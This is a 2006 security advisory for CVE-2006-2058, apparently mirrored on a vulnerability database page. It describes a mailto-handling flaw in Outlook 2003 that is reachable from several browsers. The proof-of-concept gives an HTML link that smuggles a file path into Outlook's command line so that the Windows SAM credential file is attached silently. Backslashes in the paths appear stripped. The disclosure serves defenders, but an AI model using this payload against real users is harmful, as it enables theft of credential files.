Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

2006.04.27

Credit: inge henriksen booleansoft com

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-2058

CWE: CWE-Other

Ogólna skala CVSS: 5/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Brak

Wpływ na dostępność: Brak

** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ **

Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

Release Date: Not released

Tested and Confirmed Vulerable: 
Micrsoft Outlook 2003 SP 1
Microsoft Internet Explorer 6 SP2
Mozilla Firefox 1.06
Avant Browser 10.1 Build 17

Severity: Low

Type: Stealing files

From where: Remote

Discovered by: 
Inge Henriksen (inge.henriksen (at) booleansoft (dot) com [email concealed]) http://ingehenriksen.blogspot.com/

Vendor Status: Not notified

Overview:
Application protocols handling in Microsoft Windows is badly designed, i.e. when someone types 
mailto:someone (at) somewhere (dot) com [email concealed] into a browser the protocol is first looked up under
HKEY_CLASSES_ROOT%protocol%shellopencommand, if it is a protocol that is allowed under the
current user context then the value is simply replaced by the contents in the address bar at %1. In
our example

"C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "%1"

would become

"C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]"

There is absolutely no input validation in all the browsers I have tested, i.e. there are exploits
availible by entering more data into the address bar than was intended.

Proof-of Concept:

The mailto application protocol can be axploited by entering <email>""<filepath>, this will cause
OUTLOOK.EXE to attach the file <filepath> to the email without asking for permission, thus opening
up for sensitive files to be stolen when a user sends an email it is fair to believe that many
people would not notice the attached file before sending the email.

To attach the SAM file to a email a html file could contain this:

<a href='mailto:someone (at) somewhere (dot) com [email concealed]""..........windowsREPAIRSAM'>C
lick here to email me</a>

The command being run would now be:

"C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]""..........windowsREPAIRSAM"

, thus attaching the SAM file.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.